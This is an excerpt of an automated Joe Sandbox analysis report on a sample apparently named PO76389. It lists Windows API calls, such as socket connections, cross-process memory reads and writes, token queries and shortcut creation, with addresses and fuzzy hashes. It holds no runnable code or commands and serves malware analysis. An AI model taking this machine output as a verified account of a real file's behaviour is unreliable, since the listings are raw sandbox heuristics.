                                                    • Instruction Fuzzy Hash: 1121D86960531C96DB106775EC5AAFB336CDF11310F21055BE621C32D2EB28CD84966D
                                                    APIs
                                                      • Part of subcall function 0050ACD3: inet_addr.WS2_32(00000000), ref: 0050ACF5
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00509160
                                                    • WSAGetLastError.WS2_32(00000000), ref: 0050916F
                                                    • connect.WS2_32(00000000,?,00000010), ref: 0050918B
                                                    Similarity
                                                    • API ID: ErrorLastconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 3701255441-0
                                                    • Opcode ID: ad2aa780ce8da904afa3015b1d2038b3cc90a2e558009560c2de491fff7563ab
                                                    • Instruction ID: 8e544329d6002e1df66601336b7fe9606a518ad35fab4d1356e39af2fb143a84
                                                    • Opcode Fuzzy Hash: ad2aa780ce8da904afa3015b1d2038b3cc90a2e558009560c2de491fff7563ab
                                                    • Instruction Fuzzy Hash: FD2181353002119FDB00AF69DC89B6E77B9EF84724F04441DF9169B3D2DA74AC05D761
                                                    APIs
                                                    • IsWindow.USER32(00000000), ref: 005089CE
                                                    • GetForegroundWindow.USER32 ref: 005089E5
                                                    • GetDC.USER32(00000000), ref: 00508A21
                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00508A2D
                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00508A68
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$ForegroundPixelRelease
                                                    • String ID:
                                                    • API String ID: 4156661090-0
                                                    • Opcode ID: 2c3f74fb44a7e5b64d27a071717b9f8c164eeed1384bbe3d6b65deb4a783d5db
                                                    • Instruction ID: 66182d87a2dcc479e0c16d2f3655a280fb9756eaa8b6f84b04c46239664220b8
                                                    • Opcode Fuzzy Hash: 2c3f74fb44a7e5b64d27a071717b9f8c164eeed1384bbe3d6b65deb4a783d5db
                                                    • Instruction Fuzzy Hash: 0F218175A00204AFDB00EF65DC89AAA7BF9EF48305B05847DE95A97351CA74AD04DBA0
                                                    APIs
                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004CB5EB
                                                    • SelectObject.GDI32(?,00000000), ref: 004CB5FA
                                                    • BeginPath.GDI32(?), ref: 004CB611
                                                    • SelectObject.GDI32(?,00000000), ref: 004CB63B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ObjectSelect$BeginCreatePath
                                                    • String ID:
                                                    • API String ID: 3225163088-0
                                                    • Opcode ID: 882432b08fc4af5c52b76a584c23b705f8707bca9ad48745cb351e73669e274a
                                                    • Instruction ID: 4d7e2e6a34e3a0953365472a7751363054f78e4bcf4b7e62299eb7aa9a9da65f
                                                    • Opcode Fuzzy Hash: 882432b08fc4af5c52b76a584c23b705f8707bca9ad48745cb351e73669e274a
                                                    • Instruction Fuzzy Hash: BA21B374900714EBCB109F19FC4ABAA3BF9FB25355F14015BE458522A0D37448D9FF9A
                                                    APIs
                                                    • __calloc_crt.LIBCMT ref: 004D2E81
                                                    • CreateThread.KERNEL32(?,?,004D2FB7,00000000,?,?), ref: 004D2EC5
                                                    • GetLastError.KERNEL32 ref: 004D2ECF
                                                    • _free.LIBCMT ref: 004D2ED8
                                                    • __dosmaperr.LIBCMT ref: 004D2EE3
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                    • String ID:
                                                    • API String ID: 2664167353-0
                                                    • Opcode ID: c683616ecc37c65bff5c1db95e0845e48ddc4bd56e01c812eddc2f244ab85bde
                                                    • Instruction ID: 661e299878ecd1509ac708322f17d4fafa58061501dfa6a48fb14dd95d653155
                                                    • Opcode Fuzzy Hash: c683616ecc37c65bff5c1db95e0845e48ddc4bd56e01c812eddc2f244ab85bde
                                                    • Instruction Fuzzy Hash: 2A1108321043056FD710BF669D51D6B3BA8EF15774710042FF91486351EB79C8019768
                                                    APIs
                                                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004EB903
                                                    • GetLastError.KERNEL32(?,004EB3CB,?,?,?), ref: 004EB90D
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,004EB3CB,?,?,?), ref: 004EB91C
                                                    • RtlAllocateHeap.NTDLL(00000000,?,004EB3CB), ref: 004EB923
                                                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004EB93A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 883493501-0
                                                    • Opcode ID: 18fea67e86281f52878fa7863d8ee7fb3610d93671d492e98cf77e1a6b92adac
                                                    • Instruction ID: e7ac401db8af9cb08e21172816e21462ccb03912283296dad7eb42be8b233463
                                                    • Opcode Fuzzy Hash: 18fea67e86281f52878fa7863d8ee7fb3610d93671d492e98cf77e1a6b92adac
                                                    • Instruction Fuzzy Hash: DD016DB1201244BFDF114FA6EC89D6B3BBDEF8A765B10042AFA45C2360DB758C44EA70
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004F8371
                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004F837F
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004F8387
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004F8391
                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004F83CD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: e92d4165ebbea631fae8f75ef0b1ff79e0363ea46a723ae6739a2121df9b0cf4
                                                    • Instruction ID: ff429589aa159922d4a32af4756a68d1734002e421c78668bb205e3d2e29bed8
                                                    • Opcode Fuzzy Hash: e92d4165ebbea631fae8f75ef0b1ff79e0363ea46a723ae6739a2121df9b0cf4
                                                    • Instruction Fuzzy Hash: 65016D31D0061DDBCF00AFA4ED48AEEBB78FF19B01F00004AEA41B6260CF799554D7A5
                                                    APIs
                                                    • CLSIDFromProgID.COMBASE ref: 004EA874
                                                    • ProgIDFromCLSID.COMBASE(?,00000000), ref: 004EA88F
                                                    • lstrcmpiW.KERNEL32(?,00000000), ref: 004EA89D
                                                    • CoTaskMemFree.COMBASE(00000000), ref: 004EA8AD
                                                    • CLSIDFromString.COMBASE(?,?), ref: 004EA8B9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                    • String ID:
                                                    • API String ID: 3897988419-0
                                                    • Opcode ID: ef00a58887ced46dc6e35659fd7c553e6c6426c32f4c5b9d792e8b2189744524
                                                    • Instruction ID: 207d7ce255433a5c90a85e74323e31a128bec81dbdaa84eee6cdf48abec0e4f5
                                                    • Opcode Fuzzy Hash: ef00a58887ced46dc6e35659fd7c553e6c6426c32f4c5b9d792e8b2189744524
                                                    • Instruction Fuzzy Hash: 05018F76600204BFDB106F66EC44B9ABBBDFF44352F104026F901D2310D774ED599BA2
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004EB806
                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004EB810
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004EB81F
                                                    • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 004EB826
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004EB83C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 47921759-0
                                                    • Opcode ID: 44077a303f8c39a21dd630f20c7f36d462e17af7e33eadfe4dbdaf4a2824a5c4
                                                    • Instruction ID: 546ece94e88cfef5a160ad84c406275f038266d4588bec0d43574ac8508a4181
                                                    • Opcode Fuzzy Hash: 44077a303f8c39a21dd630f20c7f36d462e17af7e33eadfe4dbdaf4a2824a5c4
                                                    • Instruction Fuzzy Hash: 4BF03775200204AFEB212FA6FC88A6B3B7CFF4AB55B00002AF941C6350DB659855EAB0
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004EB7A5
                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004EB7AF
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004EB7BE
                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 004EB7C5
                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004EB7DB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 47921759-0
                                                    • Opcode ID: 609c6e5673711b66a1f4535cfc7211f62687854400b9d0f913cdb36b884bf7d4
                                                    • Instruction ID: 51510b96942e7c399c8872f0d33c50fd29dcd35c7342cf8924b35da3603d2c30
                                                    • Opcode Fuzzy Hash: 609c6e5673711b66a1f4535cfc7211f62687854400b9d0f913cdb36b884bf7d4
                                                    • Instruction Fuzzy Hash: A3F08C312402446FEB110FA5EC88E677BBCFF96B56B00001AF901C6250DB719C05DAB0
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 004EFA8F
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 004EFAA6
                                                    • MessageBeep.USER32(00000000), ref: 004EFABE
                                                    • KillTimer.USER32(?,0000040A), ref: 004EFADA
                                                    • EndDialog.USER32(?,00000001), ref: 004EFAF4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 9c5e59687a7d12cc3e9c2157f49bfb7cc15a8bd6701f077fb684467f42a7357d
                                                    • Instruction ID: b424cafb8adcd7d456215df16d480bb8fbd92d434a23a37cbd05cb8971d0ec4d
                                                    • Opcode Fuzzy Hash: 9c5e59687a7d12cc3e9c2157f49bfb7cc15a8bd6701f077fb684467f42a7357d
                                                    • Instruction Fuzzy Hash: FA018631500744ABEB209B11ED4EB9677BCBF1070AF04017AB147A92E0DBF4A94C9A64
                                                    APIs
                                                    • EndPath.GDI32(?), ref: 004CB526
                                                    • StrokeAndFillPath.GDI32(?,?,0052F583,00000000,?), ref: 004CB542
                                                    • SelectObject.GDI32(?,00000000), ref: 004CB555
                                                    • DeleteObject.GDI32 ref: 004CB568
                                                    • StrokePath.GDI32(?), ref: 004CB583
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: fb56a99b0bad819eb215e4a2c6a1779a56b9ba95d1fa2002d7fd24e35adf051a
                                                    • Instruction ID: 7a2057d7f8fc94ef36ce3bc5834bd776d38b596fd0367718330d5b07b707949e
                                                    • Opcode Fuzzy Hash: fb56a99b0bad819eb215e4a2c6a1779a56b9ba95d1fa2002d7fd24e35adf051a
                                                    • Instruction Fuzzy Hash: 34F01934000A04ABCB555F28FC0DB653FF5E721326F088259E4A9442F0D73589DAFF59
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 004FFAB2
                                                    • CoCreateInstance.COMBASE(0053DA7C,00000000,00000001,0053D8EC,?), ref: 004FFACA
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • CoUninitialize.COMBASE ref: 004FFD2D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                    • String ID: .lnk
                                                    • API String ID: 2683427295-24824748
                                                    • Opcode ID: 0f619f87806e9a646b3be42c075ec918572a7a93b375c19cc0e1223bc975950c
                                                    • Instruction ID: 17c19c60fd0f929bd2d9e789e2538275a3e4fb7b2a3f9038962b3363abd4de47
                                                    • Opcode Fuzzy Hash: 0f619f87806e9a646b3be42c075ec918572a7a93b375c19cc0e1223bc975950c
                                                    • Instruction Fuzzy Hash: 9EA17E71504205AFC300EF65C881EABB7FDEF88708F00491EF55587192EBB4EA09CBA6
                                                    APIs
                                                      • Part of subcall function 004F78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 004F78CB
                                                    • CoInitialize.OLE32(00000000), ref: 004FF04D
                                                    • CoCreateInstance.COMBASE(0053DA7C,00000000,00000001,0053D8EC,?), ref: 004FF066
                                                    • CoUninitialize.COMBASE ref: 004FF083
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                    • String ID: .lnk
                                                    • API String ID: 2126378814-24824748
                                                    • Opcode ID: 0a8567c102c41e5f98432044f3cc38da7b37d8124e62458ef485c7494206e024
                                                    • Instruction ID: d7906453ae6fc5d8a4ddc94110f875b29a8897423b6e1ba3ff770d51f6800902
                                                    • Opcode Fuzzy Hash: 0a8567c102c41e5f98432044f3cc38da7b37d8124e62458ef485c7494206e024
                                                    • Instruction Fuzzy Hash: 1EA144356042059FC700DF14C984E6ABBE9BF88324F04899EF9969B3A1DB35EC09CB95
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #$+
                                                    • API String ID: 0-2552117581
                                                    • Opcode ID: dd5355d53fa2c3cdc48778633f5a980b0f8006775d921c9b43c3f76cee05fc20
                                                    • Instruction ID: 6ebfa2f19158443cbf1fd8f25ca2eead4bddcec33baf451f7e06727226c17dcc
                                                    • Opcode Fuzzy Hash: dd5355d53fa2c3cdc48778633f5a980b0f8006775d921c9b43c3f76cee05fc20
                                                    • Instruction Fuzzy Hash: A0510239904265CFDB15DF69D440BFA7BA4BF26310F14406AF8519B2D0E738AC86CB25
                                                    APIs
                                                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0054DC40,?,0000000F,0000000C,00000016,0054DC40,?), ref: 004F507B
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                      • Part of subcall function 004BB8A7: _memmove.LIBCMT ref: 004BB8FB
                                                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 004F50FB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                    • String ID: REMOVE$THIS
                                                    • API String ID: 2528338962-776492005
                                                    • Opcode ID: fabedd91c93a7d8270f23867e9df4392e49631b0687d20022c194e9198368490
                                                    • Instruction ID: 3088a64d7e7253a162fc8304403b2b3bbea9e639fc0ac41825eb525a3852d0f6
                                                    • Opcode Fuzzy Hash: fabedd91c93a7d8270f23867e9df4392e49631b0687d20022c194e9198368490
                                                    • Instruction Fuzzy Hash: 64418674A006099FCF10EF55C981BBEB7B5BF48308F04805EE6569B392D738AD46CB55
                                                    APIs
                                                      • Part of subcall function 004F4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004EC9FE,?,?,00000034,00000800,?,00000034), ref: 004F4D6B
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004ECFC9
                                                      • Part of subcall function 004F4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004ECA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 004F4D36
                                                      • Part of subcall function 004F4C65: GetWindowThreadProcessId.USER32(?,?), ref: 004F4C90
